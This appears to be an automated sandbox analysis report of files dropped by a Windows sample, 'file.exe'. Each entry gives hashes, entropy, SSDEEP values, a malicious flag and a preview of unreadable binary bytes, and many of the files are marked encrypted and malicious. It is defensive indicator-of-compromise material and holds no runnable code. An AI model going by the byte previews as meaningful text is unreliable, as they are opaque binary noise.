          Preview:var M.O...A.*..q.......Z+4n........#C.kL..Y..X.+.A....![6F.T....!?mn.V..JI..$dX._..B8.F..TEJ:.H..y.#...&.3.I.....*...{.q.1.D..#..0......~$.L......v.0?....Y:.^.MHM..W...CH..%....w..m.I0..,)..c%(..bpJ.XQ. 2...d....O.{.....*%...0["........]..|7......d.W.^....J].)...v.I...[.2..KVe#5Z.T....Ir..'hz.po...j.....0u..,..H.....7."S...R..q..f/..-r..FvW'.....%v......D..R...~.P.....^,../yX(.T..~a...2..+.z.v'.w..I..#.._.e.wp..W.P.c.e.T\....u_.@..."p..r..H.dH........&....A>.&.z..xKB"=+..c=....b.d..V-...*..7JB..RU..E..WEl;.P.^bx>.e...@...y.o...oZ..~p..y...K.g.,...8.I.....j...va~.T...}r....J.%..*aM..IrS...........`n.pJ9..O$.0.*.....uY....+Y.NW.1t....,d.....y.;.K..8q..y....Su$.d&;..).&aM.j.w+R-....H./..TT.../..6}...e.LMz....Z..l...CD...%B}.x*...B..z..O+u.^....t.........5...8.....1Y.{...f4.4..pt.p\s'a..k...Bz..E.E.G....a.....a]..s.t..K`.#v.~... N..s..Z..A:S..6......g...H.Y8..._0......e..W.X.;d..O.....H!..Qt.=.. .,..(....l5...+"V,.$1.=.-.i[h.p!'....D.X.T....4.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):6235
          Entropy (8bit):7.9683788310161745
          Encrypted:false
          SSDEEP:192:LlUFh7kvesb6Tx+QB44t5sSLbDlWfctJ0mqFoAPfaEB:LiFWv7W9XyusSLbEfNJFowxB
          MD5:605D259A3F3D70E8D2C2DFAE6EA5A604
          SHA1:CF4F5D39056E5CE6078948CD8801E1D61B1EF79F
          SHA-256:318BEDBA4D28777A8AD318CE52A1F0043B4AA2251276E7148AC2896D08C8E91B
          SHA-512:778FB9D15402B6BB1DF30CCD89DAD2EA8EEC4821F2FEA5F2B4AD9B759B2F18606B46E9685E19E2A4494E9568CF0D96E431098B73C2D94F98ED07743E9E6D034A
          Malicious:false
          Preview:.b_se..#w....7......2...)...%..(>..#....IC/.&\..3...w..A..0.8..OS1..=..6........$.+.k.._.VX..P.&5.8.S.)..E.ad...:......[>.K......{.W.{.b|.eN.+.F.4..|2R..M.co.;q.s..`.~...s_.P.e...V.51.t.#*C..N..{.9.....PY...yB..)%...-....'PR...'b.....`..4..[...Qa.~.....jS..X.XG.....F.{.........h0..|V..H....G.....[..4.DE....Fz[_.(pK(.m......H..~.......2{.GH.^@..D....@....QMj2...eS\+E.....:...7.T..e#.I...c.O]"C...YrVe..Z.1..d.*5..n.b.X.4g...*o...Hu.b.x&..b...C.yi...Kb.#........[k.E..6.z.._..+....[(.b....+.W.u...;&..s..w.....5.....:^A...*0{.o!?.3..........J.6..ZR...5..V.....&..;2.>.4..}........l..2.f...a..._...V..!]D4.J....i..!........."....Q..b....G.,....9......v./p.....y5..Y.X+/.xI..i9...j.Q..X....A........%...t..3t..<..z..U.......R.....d...NG'.@......}..a..DR......G.i~#5.,%n+.r....@-....ex.p3g.:<..THZk.M.'..Wy.>........).pdgf.a......]..p!.j.f8...7?.Q.(.K..E ...9..8e-.....6..vxG...)....v...#...t^.0.2..E......D.4......kY.......u.(.&Y...g.......a..'..]./..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):67448
          Entropy (8bit):7.99732169523604
          Encrypted:true
          SSDEEP:1536:gAK6GB85mnmHvclMW60Wt/+oCfViq7j8FjcUa4vMJlefO67:gbBgmudptmoCdiqsF6+m567
          MD5:36AA9E889CD3EEFD70F1C5236758C08C
          SHA1:B50D1E3B8D19C67F7473F316E6AA6FC5A064E555
          SHA-256:B8472379232CB25276F501979412E20F7A1C0DD7AC9611DC9EDDCECB52854004
          SHA-512:0B265993773F159E793474B8C9AE6C320B4BFA4473981CC5D1E07941F2232E9E8C82B0CB1E3B529F1D2861D53FA1B7A59E8261F743BBEF893C119E89E9EBCAD0
          Malicious:true
          Preview:@font.0Q_..S..Gs]...WBN..Ql..`...P..^+_......Y4v.e..a'...S(.....h.:....M.7....5].p...p.....:rd...f`.4~a>...:..S.;.>..!...o..jm..9.0j$i.&%....i.tJ}\...I.m..XER+E..N.@.......Y5..(K.R.....=g...Y8....Mu3.....uXU.z...&..R.X ....6T.;..I..qP..|o.(g.-....y.....G{.=...T..2;...80.......!.dt.$......|..x..]..?.I%.H...`.t..0.>...IO.N.RN.nl3.g.N..5.. %r...]......%3pjyAzj..~f/...am..2p0K.?.u.Iq0.z..........b?..M.8St.....X.P..;.3..*.z.U.i...D{v..p.MVA...w..1....Ru.{b...;..s'...J..'....?g.VA...U.L+(.....U.T.......j.0"n#.Y.~.....X6..mH..8.....G.,_GP...S..v.{...^....(/za.B....<... ....?....,......;yV..S.P[.;....p..`.wG:.;*oz..v.......S.....]....RI.H>I...$.._o.~.=a....m>.<.....I.M;..R.h..p.....*..H........"M5..] .....5...qV.t...W~.5./Y..i.....R.3.H...5&m..|....U^.q...R.0.y38...&.......N,v....G..M..z.fh@......J?3...U...):t....f!)"...z...$..^....P..TS..y..].V*.z.g..t...[.X.u.Y...Gk03zF..{.sp.DI.G?k..2.Ip2TP....R."./<.....X..K...6...m..G<.=.y..x....=.....OQ.f.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):40292
          Entropy (8bit):7.994719745641031
          Encrypted:true
          SSDEEP:768:e4GSdXTPtFmlQDesIbutwd6QHXOScsCw/1gCgeVUqwoOUdtnbCl+SeVwBULv:e4GCXT1Q6qsaTd6/zEtdg+HOUddk5owS
          MD5:C2D00AD025C11B9CD58D79D978D21E3C
          SHA1:A119F0E1986A11BA2292487D2105DF2F0AD9F308
          SHA-256:460132C7169C20D3AB2B95EFE56C4873F3B07FC7A24F2149B0134EA41655FCA0
          SHA-512:16ADFEA0831200EF1C96B10D8E95192CE0CC3644B41653567DB8D7E7868D133CDB68AFE0E59C5388F31515443EF5A56AD07E4DA6B93D1F343BF5528B30518573
          Malicious:true
          Preview:var W*.Xcl..*..4.A.C9'.....:*j`...U%..c;....y...M.W...1..x_.IM..k...e)...P.R.'.,.(.^GJ...y...>)v>.{y~...>='..#T2.!7^.c;..DV..iK.n....+m....C........D\....#...Hc;.....w..0...CK.i.e.......3....g../Y{..`b:......G.'..}...x.xn'..........Y.xQ).......p.pR......@uw/5.t......rn...K..J.M..{5..\L.4.......N.b.#........C.#.j..U6)h......".."..V[..5lM...\F.n....y.Z=..Gs.......m[....[...%&..s=..W.6.{.....k......p.....R.C..*x..~&.;.y7..BZ..H.R.%........t...7...^ o.;2.++$..sF].)...+5..G..=O..".3.x..{7m....LZ.$....e.....3...G...n.~7..VL..&.4Z~E..Y.&a..H....1=.|mq.......&.....e.e...7...... =Mr.6w.>.......[>.D..}.....-mYv..M..1..Qy...D..'LWi.....d.`9./9...p....@_e....'....&....l$....$4P....f...hs6.8-(.h.E. .../v....6.f..._..,..y......I.....M...g.'a=.y.Yq7+...G.v.q.`..Ez.\).........y..B.G.:....@....S...(Ko((HZTEz.e..~...V.2...{.Vn<Q..n.b.w....gj...../.S.2.;.........W.9.._=...V..8..2.Z..2.J.Oq...z.{w...p..Z..g.....Z.gK..u..a...,9..l7.....8..RG>.k..+
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2193
          Entropy (8bit):7.915018083467836
          Encrypted:false
          SSDEEP:48:N4auNE35mqjbJ3uvGMZ1tgPLjprNaVJ0+fOmW4wf6KT8iD:NcNE3Hk0PHyfq4bOL
          MD5:1360CB3B5CF0D0D7F19731406287220C
          SHA1:63DA137CC3AE404800C2C585EFDC6CAA03F10F82
          SHA-256:11607BF8DCBD93DF52CCA9B28C5C04A8FFE8C75294FC6F6D7C9E8D8BA2433DA5
          SHA-512:EC48FDCFE419B6546F60C9FB200CCFBFEE21A095282CF74452C449AAF55C7EB647BB9A9BDB86F3B74CB699D13B4CC0E30D93BE090775614B6A3D1434340A561B
          Malicious:false
          Preview:var W...^....?.|.P.sl...W.|.4..4.%.Fz.Je..j....d..../...[....m...XHo..b.g..4.A...N.......Y6....4.f.2...._.{......X..]...\.......7w..*....88..N.Ha3..;..;.N.:l...,.d +F].......E.[.re.;[.....8.Dx...f.....E..f....lv gG....Eg.h.....(.R.L......$.a......D$.L.,....O.[.K......Eb...@G..M.Y.(..v..%..k...0..j$.g-.....r.op..1_]q.S]...Z.,...sD=.JNil...Fu.DG../.c.._:$....(..;.S....t:.6..6..a.^Ah.m.&....~.!8..tv..e!.k..%..0^.....{.@.L.R...Z..Pf...m..`...b!.....s]...T..c.....v...|.1..>....9.)9._....zNz....2I.%.t..:.f..G.vHE[..0..(.......g......."<<Md.$4.....O...&.-..$....R.x.I".......V..W..G{w.m&.Q.I...5..1^.yW!.t.......Xy..$....Uw..3.JZ.[2.N...s.B...r..M.`...K9.\.bY.z.Q.....vg.F...(Z...Y0.@..U!^.5..4A....}.p.?+..g.e....qCU...7..>0..<fv?...fl.s...'.~Dpg..N.@=........t..H<."`........:.g/t...u~......H..Eo.....g<..^.y.T.+%-J.nP..Z$....X..f...L.t......g...o..Y.R.._.Gp.C>..aNy6Q...tr...lW^H..,q..7;..QL....E..mLu^..@,...G..J.z5Y.W..`.A9H.IP..usZ...r1#
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):447
          Entropy (8bit):7.378559777865386
          Encrypted:false
          SSDEEP:12:G8ecxtCz/MOTNNkOVl9+hMBxQl+kwz1NGixpZacii9a:G5cnQNvM9+kwpkiTkbD
          MD5:7C012C6F1980C72F5E63D7C83BBF446A
          SHA1:ACD8F2F9DF426B369361A8EB24A95A0383F2C4FE
          SHA-256:0154FD0FEB299E94BA00E86E037F420446EB9A755A4C3F34365956F4332E793C
          SHA-512:8AA06846F93C16EE458207F1E7DE3B771DC670377309B932488891A329496466D0AA04C542C8B1440E79E8D3CF0208D38B5489DBCAD2B07833701E789E798FBD
          Malicious:false
          Preview:var S4.{...a...T....k.Q..].%...#....._...g........r..T..u...|..GMC......k...t_%.'...[...#..f./.."..j.H/..\.'W.+C...Xz....2..}.&V...M.U..d..q.C...}2z....q+Y...N! .....>Q..v&Q..0H..p....$/eJ'17.E9.z.q..6../.k8./bn.......Y9!..Qe&.7|(L.N...f'(.E......g..t...N.....8........4z..]..wNw.....:.cB.sP.....p[[............2v.yT.6=...s1.k.c.........Zf.&z?.)..2.O#..e.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):126434
          Entropy (8bit):7.998585451008742
          Encrypted:true
          SSDEEP:3072:CM+agKJkIiFiTi/Exvfv6nBhIQQmI3wMWj+8G8JOGkXmzh:CM+fzF1Ofv6nHFXcezGeOC
          MD5:56340A8EE740D02BCD32B37898424BED
          SHA1:14B1E9797A6172819C62247B87A84DF4C61A33AC
          SHA-256:298D48B2179D1C9A50C556D2CF8A69C4B58BFC722E49005938F3CD201AFC38D4
          SHA-512:E6A30B757864CCA9154F6925B81E76EAA994C6AD708BEE790CA06A348BB56E8B42544CB209F55A41041A78E7EBAF66F61968A097EA8FFFDB7E9C434B0C7C338B
          Malicious:true
          Preview:(func.N...v........'.....}......M..c.{.*.8./!....#U..P.\..\..Zn....-.tO...w...)..=`b..I...F....cZ.s......h.X).{5.p.).NC.0.*o....J.>....q......I..A..?.|.w.s....m.e..\.e....../QJ..6.w..?{....W.R....'.z.0.yc..>.......]......WeZ.6W.b....,.O...zl-...U....-.4..QQL.9.....=.j._.U.c..?..WHd...].@.wv"A..|rH.....md.B.#..d.F....A.."(_:V..3.vWk..qBj...\u.$.r.......w....C3.^.(H..T.F'v.....?...\L...I...CWi....b{i..o...B.D...L....f~.KZ...IL...j...7..v....2>S.E..tBm..%..$.o..~.?rtv...l..8u...;...{.....L...T7F.a.@.\.#)....%.K..l...,}.*...?*.8..G.n..........a......N>?{3U...sV.^.-.r.y&Bz6g\xt..P..]x.B.T.[z#..Z*S..WQw.<...a.H.{|>93..<H....2N..".tc.>.}|R..EG.f.u+.\..5.h..n..c.......W...MM.d.N.4.|r.]!...V.j....':.......vDC..N..q.H...6M4d=u.h...w.WTo.....}..^OQ+...!u.E..............K...&..I.%.F.0.?..hw.&)e.#(.*.`x.P.e..b.U9....{n...J.....&.,.v.|.Y..........XV<.....EADd.4.+....V.m.....v..!v..q...`6-.f.{..5.....I..Lw.~.<.{.(...>w.%......[@..._.$.......
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1949
          Entropy (8bit):7.89362818064799
          Encrypted:false
          SSDEEP:48:teG4sCxxmrHTaq0doS3y8M7QoEGWaC6Ear/LMyiiD:tX49xxm78qGy7cv6EgD
          MD5:BA85238C26B812A656DB38129CAD8786
          SHA1:132A093BDE4FD15E4AA21052E1565F6E9C842F72
          SHA-256:C065A44A4061B2EA1E824FFF9941EB5A3E39A12C7326824639DD49A53027DC89
          SHA-512:F139409CFCBBEF2B91476ACDBCEA7C0EC43D5CC3A5245583BD04D51E5CB614968686D7776CCC86FECF4930245ADFC431C9CD0508EA39B44CC280F07355D87850
          Malicious:false
          Preview:var W.O....=8.fQ...S...]...c.[...e...o...<...............k........E<...Nc..../U.i...t2.M......tj.TsU.......!oG..Z...[VYx..2..:&pmG.&......A8I;/.F~..T......l.b...$......)S.n1%..Bc....'<..D....Wh.>.../}.n...'.-.4....a.:..2..,..)..qc.....&....l..MK..e.w.....U......~.l....../.....A..x...f7.r...]$..[......<.>.........2..D....h.w.(......^j..c}.......L.~.3(Z...B...w.{./..8.P_.,......l........?9h.hJ.i....*]7.*..\T....UU6..;..us...iY.B...Y}.3...Bf._H{".............im..7.4.....lL...z...f..4..M(.%.....7......U.{....v.9.s.I.g..5@...N.C&.......28X5I".qP...2!..c.|-6S^.q......~..d..b.nI.z.... U....@..G/.......N#.>....w./.ff..]C.........Q%&:V';ae....R.MT...c...h.n.2/HV...~e..Tx."....}...3...N$...=.}..........B.*@1...=...I.Th..2..........."B..aoc#i.....D.`.1..D3...w(.........20b.'.v*....C...F..1].....!^..?f.;Y!}..e..)Y..!...s...Xid....... .~1.?>..._....z.....TWe..vc...I..._?......c.(w1.4C...z.t.....bg....??....l...h.f...42Q.3...8..N.<.....$..e..j.....#
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):20755
          Entropy (8bit):7.991864023350242
          Encrypted:true
          SSDEEP:384:QVx245zUcyvhqG3wzgap97cBiACnXv1bNOZnfZYgzy2DmIKHwlk/q0I7xKWGDcr:QVl5AcyvhFgppWOxNA62y2a5llWGYr
          MD5:F61A69426D99B863E446D89DD554EC29
          SHA1:31B506E33837F7DA6FEEE5D6B0ECB08EA9AD0DCF
          SHA-256:76B9EB33C8E1A554CBD72ED976A93F9333B7CA091381D74CD1639390C447E5F2
          SHA-512:5F9117854F8672C1B917BD0A7387AC06A519FE40D4C86B03CD9E582C5BAB925379B063889D50EA78385DA4A69D44741B22AA2900090B83CAD27859F1E727D4B0
          Malicious:true
          Preview:.sw_p.....V...{.pl.p....ZnU#v..Wk.4L........{........'&.!Z.M.$...FHz.=....,.....6.A..9...5....6.>..*....N.G,...h....p.}.PE...'..|..6.\.(LC...`EY..e.i.+Z...$...bo%8A.S.D.R.....eam.\k.....UcC.,...d..MI...,h.!....b...M.o.?...&p\.O..~j.+Q.*z.T|..BY'.j...{.....V......8.iRQ........J<.i?...yx.f.Q..D....@#.z..].....i....r&..|h...4.....!..H.d.'>...t.=.k.~Qa..{O..6.../}U...^...8D.b.9.w.....g...Q..n..E...</`.`[...ehF@Z-.....d...7..1...m\.y5..L...F<n.0...Q......1m!...R+.....B.P.2^..nC.^...0.2Kj.m.L..i.k.Z;,.p>......n.a4.Q...%......$...^o.+.|...<.sA.....I/.......e.N..}rp.....Aj`.g....b..,<}.LP}..0pA.V.nb...x.8WH.OQ.v....|w.1.\..uL......C...E.......HF.. .Y.x.${.xM.S..0.C..3h`..ps09..."..........d3.....:.H.U..l..MQ..9.#.0...]0.(.F..r.........$DS.f-:[.~I.}=d%...Ps.........A..!.F.....[...t>^hjt...'P.>..N.P..Z....H4.Sx.B.X.A..!>....]./.2.3......q.-.=y][..K.......C.....@..2.......9...(..QR.....[,...2...e..NU...Y..$0...)S.8K.>$..2..Lc................
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):254754
          Entropy (8bit):7.497327250115442
          Encrypted:false
          SSDEEP:6144:231SaLDVmqJoe3/s7qv1CCyNKN9LfdfwA0k3LZBDYguV3:2EaLDhLUW9CCfN9zdfg
          MD5:62A9E1DC8B46CEDE68F49B0086C57E89
          SHA1:BD0E2EFE21C74A92E7D76D28BC9043A637BF1F46
          SHA-256:17DF8E3D53850BA04C9F83036A533F4D6ACE03C511AFFCE3AA704A1D55698A76
          SHA-512:ACDA6820D9B266B8FA8CC1532A1104D66A2A07A1C9A147F762C52CBFEC3BB1999D80BC07F77E85045CE10F121C9B9362B3D0A7CAF763DA256651E61ECB9EE0FC
          Malicious:false
          Preview:var W....LZ...-....%.0...b3..>....C....N.tV.....)Nf`.....Bd..'..d..+...r'..8.......h....ZV.)U...j.D......_.....8.y<....8..F}]?...R}.)z.h..&..M....r....@/..Lr....hd.2..7.d.O.\z...x]i..E..\..d.....c"..l.. ....._.w.-)W.nP.M.<8Y.`dx.X.E.H.U...S69.V.....q...r.i..M......>r$4........BR.|_x...1>..[.0...2[}6L..ijB...qA...f.@n.qlq..I.?p0.b...[..G4hd...?.>...LL"-.5.....o.....v..zf...q.xA."...dG(.....T$1..Jv.....)..1..h...0.$....5)Eb.*YiL..Z.&...A.9^.%.....i..NjW".....z....S..,....F..xt(.............l..B.`.@.}...pc..1...>.HF...;Mp.h7d......G%....{z.M...!..*.{X..<{.U.f.lq...,......)....u9.O..44..l..i........7?4.s..1.r...*...(.(..j.I.(..R|`..[Nr....W./... ]W.#.K!....K...u.....b4...hS.O..Y.....'.x/......3..W.].!..ym~..c...b.5.s.~.....H..jf...0@.Yt..U...h..,.J..srm.`.*k;). ...{6.=.+...U.ox.XQ1..[\.&./....R..).h...Uv...r..$g..........5E..EWHzDV..&.Hy....|.9NY.d.\.-.n|...|..Z......Q..A....TN.....8W.9..'.KV..:....O.T../.....*.E..N...O.t.)R..-T....t .|
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):58122
          Entropy (8bit):7.99681404598447
          Encrypted:true
          SSDEEP:1536:airpcnBjHAn7po9urpSS2C4Gp7ccTX1Utsco13F:arjHCbVZ34G/Oscy
          MD5:19A313DB03ACBA46443129FCE32AF6CE
          SHA1:091E257FB4E64DE15D171430F0E9FC1D0E23A8EF
          SHA-256:AB1DBF4C26CFC8389D7819A23680FB6869FBD318A46D1B9EE503CF318249391D
          SHA-512:9113CD2C752E353174DA16EA86699329F6013A27DB71BF1CA309160BF99780B1890BBB9BE06E9DAFF6EE0A0A5AF7BBDBA3D34760FCE7EDE7B0E040D45D456BC5
          Malicious:true
          Preview:var _.g..i..J.......!r.ET...gwL6S.......[6.:......al.nU.9........|...%....HK...tS)*B.%..H6.n..j..@...<.RYx.!F......b".@...f..F>5."[..........q`.A...G#E.0...U.2Kh:..n.V...Q......vm;X.:K^YOqnR.f{e.....F[W.0..9p.~.{.y..!w...-j* ..(q...|.amJ.,.@..Z...d...>......~..'.....h.W..7y.......k.)...&..r....[..).....8.e..S..Gx....}..{9..2l..j...V.d.......Q?..?.O94..s.......p..<"....e...s...k..JM..+....D...F.."n...o......k...(.'F.D...L<..(..3.....%?.34._te.....G..]..;.5.........Y........xZ...K.)3.8.......K...+..\A.^.R.......>.'.6=...C.#..!.~.UT....K..u..vZw.J)!j0@. .R..)`.3K.]p...`..g..4./]....s&5l.P...5.TYwy...p.nNJl.5.q....|.."{i..vM.....#..3M..f..u...<..B.,C.=...U....].......F.$.....i.?.....KOWB.-......w2.J/.c...D1i.........fz..e..........V..4).......z....'.S..U....p.B.....?./..>w.....w..,..`..!j...n..dHz.e.../...d........BF.4..9IQ.0.gF...3%zis...VE;..N..]..c...4+7C...Z... r.C..8......?a...9.>(w.3..._8..!.5Z.n.p.T..p..P.OS\.ev..Z...<Mm5...E..=....x...J...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):95724
          Entropy (8bit):7.998416173834155
          Encrypted:true
          SSDEEP:1536:rEXwNFNEzgukaYMuFru6GVOrQezvqJkteYjiyf10iil5/5tqBOCJEMjHxJuCjjmn:rNNzEcuqFFq6GVQQeGJo0515g0CEML7m
          MD5:C73DD177D1DF368D6753F8D5B4538CF0
          SHA1:A9A3129E32168141DCD9275AF7DEE7FFE2F378C4
          SHA-256:F2C752EB109942038FF0DA1A7D23F8FF218976833194E812219B7A06841CD99E
          SHA-512:8C0362346E8816637E1EC5CD5FABE4D3E27AC74606183E3E118DE9947317D5921C45BAA5EABECF5439A1447FAD820ABC4F2354094B3BA06BF422196C9F629DC5
          Malicious:true
          Preview:var WZ./JE.....H:m.....!..%1.e.$.?..'...M.........hGG`...eqW.i...).N@.Yp..._.@..zuj.X........jS.;......}......1.....0Z..x..\;.... o..=@5`....YHI.../........L2........K.....B...\.....X.`.......O=..3.0(...U..d...E.}.s.u.J.... {....<,...8.....V.>b9...j ...{.1{.q.E.d.v...n....N.v7-..X.?.^.....z$b~.N....r...m....z....(...c...a`-...v....&.....M..=5.t.....]...&.gke....b.@K.-.z{U.'..xH7]T...}........;p&...wT.%v =..].........t.P..2.*..6._%..]...@f..CMvp.1...9!R.Y#Z.h}.?.An..l9..S....b..n........;.$i...p.G.1.k4....L@.'...*..`B..#...x...x..Hj.....&Q)9..M.:...#....[K..^.z..7P ..E....$.* .hn.%.0D.I.A..'.,..N.Pw_..=........G..zY..y.xHqs.u..$...y.2b....&=9.)....qz...vC..{h.3F..E..1...cU%.2.T_....A.2.g...+AA..3.,=..o..R..q.F)..)..\Oc....D.O..........<7.K....}....a8...../....,...#.%.yt;..mR.TY..~2....O.5..K..*{RPl.m....>...^=w..?V......5)!..2...A.r..~.;..0.dE;.......q...?.f+.F+2.L]5....?R...=q.-..w35..B.lb..1.l..%e..)|l...q\..).4b.%.EZ...yb...../!1.B..-.q.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):49454
          Entropy (8bit):7.996529947276938
          Encrypted:true
          SSDEEP:768:qF94Ym0rhH2B52CeeGWBfrYjAII1FUBce/DspybkbPVgSQzY1ahEBt+Qop+rEn2X:M4YrNWB5XGQ0zEUB/be7n1aUoryZT
          MD5:509E51C3727763D39D848DA94E6388D0
          SHA1:62B0C1C30F10AAE1EB910F231B36FF06A86F4447
          SHA-256:D11A78FBB290E362254499723B8F5CE823D4F1320A9EAB47058665D9F7CFCE71
          SHA-512:FC47E4C26DCB297FE27B042EE337ED2F565C7CB567B5D91FA7D362FE5812461C542DB97401B7BF594AAA0FD0659E76ED7E1CDD2B759881B6A5572BB9EB626D77
          Malicious:true
          Preview:.....U.D'}...........H/.'.W|e...YZ............1@..N..m.t..P.....dt-s1....?."...._)m7..x..! .:.|-.+.kco.8.`P6=.mh..$..cV..?..1....KJ..3!r..-S...=.../..P5.X../;..?.^.i..v..!....h..!...&..`..uYg.jh^..9K.....C.#1>}.u.".<...-...D,..}.*.B?......h2ii'U..V....sS..4.[.....<p2c...J..|-Co.......Uo..#..{Cf....O..*...b....Zu.D.``e..U.....khV...1.....M=l,...}.X'.J...4.8e...l.. |..V.........0...0.........w0i.9.....I0........O.l...%...a...^..8.2...........%......:x.2.?.$p.q.5....j@..&w.T.....^U....](R.1.Wr,....X.n.P../.J.[...~n[.x..l..r..;.).....S.].:.r...O.fe0..X..%.5&....YM-..L...S.z.2...0..a.....j.'.x...5lZ.....!.IL...r..`......lw<.Yw..N..*`j.@..^Ap.$.j-)fjN..........}.vm+.l!..Q....];.\..+..'Z..;.I.nWS.......<....M..T..q.NMt.....S]9.`i....n.}.......dCy..>..S..._.3......}\......;g.....-..-(=t..?.+..*.[.Gwl..=u D..Hn...H.....].h.....-.{.:Z9H..@...O.U2.I....4.$....%.......ub..Z.....j...:Z..\.q.....J.4.V..[q._.E.b.....t9..\....j.....:.g.5y.7H...Q.&."..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):48299
          Entropy (8bit):7.996170669190679
          Encrypted:true
          SSDEEP:768:U/Qkp3BvSlVbyyNF9dXRYV27pNIe0tjp6fSVbEthjeUmqgv2QjMF+xeKm8DOB:U15BvSfyyjmV2cVtjkSBEthjOv2VF+cN
          MD5:70196F1C950EF2728FB7B2A46A7641EA
          SHA1:EE5BDB825D212501C28EA8B0CEC4211ACF44E03B
          SHA-256:D24E3D962B01E9598ECF2D52198AAB9F03A56174B66086EF61676166D2A9D4CE
          SHA-512:415E0A9C409E192C6D5D8BD25E84F755CF7112FB0B8CC2DBDC4CACDAEF497F0BBA08A757C616780F151214576B39E424B80BB2E2A953BD6E3886398C42526952
          Malicious:true
          Preview:<root1..f.R.&.i(....f.2.o....w....t....V....S..B6.|...X..J.$.d.g....T...G.%'._..k6,J.O.$i1o:.."..8XN....UjY*{.o..F....\........q1_?...".C..;;b.).....l.n...<F..u_I...C"t...z.A{Ug.f.......!.6.A.F.......i..c=kM.......<N..I.B.gpL.-..G.....l...?...&:..o]..L....M^F.76/..$x..o.Y...hVR..s;c@....{m...6g.).Z.F=OP.....DA.....g'....dD.2)..~...9..Sp...4..@._.o...5.L.>....`.k.JN.S|.r....b[..W.. .3.mg[t..6mY...H...;..[..H...S.X.+./....'U...*8gN6.C.E..;7'.%...Jl.Z.O.<..-......SVe...Z.sT*'6...S.................(....y.b#........Ea.[.........2...P..@.Mii.^.....o..~u.W2.s...B.NHc.......MO6....!..LK.yH.k...].Z..2.C.rF...-.....U.h:.A..o0W..=.z>..t......ypJ..N.B.............e..Ha;.r{..?....\,.O..f.u..C.....6jQ0az)......O..N.B!....R@.....UY..&'....S^....E.../.7..}..,...;...F.d..Z...T.**...H......r..:.3.pm.z.o.|.M.....[.ov.p\.D.=K?...92.(...UR.S.Q.J{]8&...FE..@.....^.>C.-P.}8.8UZ4_.r..OnA......e.~.o..^.<m...........i.F...K8U...?m".....GZY"..S.{.E..1l..^.[..9
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1573198
          Entropy (8bit):1.3192761756967133
          Encrypted:false
          SSDEEP:3072:/Oc35w4tZf3JGrolXphB4jgkKS44iA9yR+XYgrCXHdDxKuP/yKxaPaI:GY5zf3PlXpT4RN99yRMTraHdDxpXy7
          MD5:29EAC7087D69BB9CDBDC6DB2AB2099B9
          SHA1:432A13B4A9CC0F9CD0B5CA4C4E271614D1EB6C44
          SHA-256:C22B5F413EE0ECE76E309A8B54E15DF44DBFB035C74982E025A774C99310BA46
          SHA-512:BD955524B2DB5E870D443D5610F98EBA0A3B8FBE02988DECACFDF937CC35D57AFDA8C208565403023A458F55F0656C66FA62B8A87E83C5D6B77C142D7AB2603F
          Malicious:false
          Preview:u>.......&..-.D7.j"i ..W/.QO........3..C._........gF.._KVM$.N..?NM.I.....~......;...5.).L..k...L>@Y......"M......d(..8P.`6.....P!(1f.......'...;..N.6....z..A&.8..v.........;...v.. .o..B...p......}DSB.o..h.*...].\.j...............J.('.P..."...,.....<..MDD..U..j....I..,.E..H.Vv<..).n.<....Tp..u6....Z.......si.=.C).%H..%".ezF.......r-....uS...^.j....m.........^...i;)7..Tx....N.w.K.'\. l%m+f....L..1....n.+;..^..*..>......f..}.K.TQ/....rJ.Q.Och..g(K>f..i.?.@!G,.X.....\...}J.....z...h...-D=.......w.bS.:..S.p..D./.%..?.L.z...(..k...;..Vn..b.A_e.........ZQ..{..Np.V.U......Z..<...WFZdRF..P..1s...[..d.... ./~.QO..=|..f.....\.....O._.....v.`k..X.iZ..R...........T....ay.T&.....!q..T....0.3.`....@Y.. ."*#....".6..D...#....O....2E...._.f8.:...d..j..+.%AA"d^.. ..j........../....-f.\ .4W...s..^}.a.:k..]. .z......s...........@.@.3v$.-.u.-...f..YQRu.$n$..../i.F/%u..I"jG.Y.."y?%9b.<.<...1.."1..bK>l..u...px...g.%...D..;4.#...=..3...L.W.<..`P..T........Q...
          Process:C:\Users\user\Desktop\file.exe
          File Type:COM executable for DOS
          Category:dropped
          Size (bytes):16718
          Entropy (8bit):7.987813933339964
          Encrypted:false
          SSDEEP:384:rcZZC37CtzF9sNC6zzMLyEJ6ABbV6ceRk7yHZMGeIJL+X/Twcaz:oZZCupfsYgzcbV6LCwZMoAE1
          MD5:831943E1FBDC283253B64E35C2E042BD
          SHA1:5FE25C691EDA288A90012231897FDB54060D63CF
          SHA-256:FECCDBF1888F575BD4D3EA5B02723F3A055C9F9C4C69880FEF57F939FADFE42C
          SHA-512:7DEB8A0EFE604525175297FD45D3C9374E5C081F45F4283CBF02760356426C64767A90D0DBBD3AC65DDC8C04F3C15852671CBFDB1A4B292D0DDB58176F3747C0
          Malicious:true
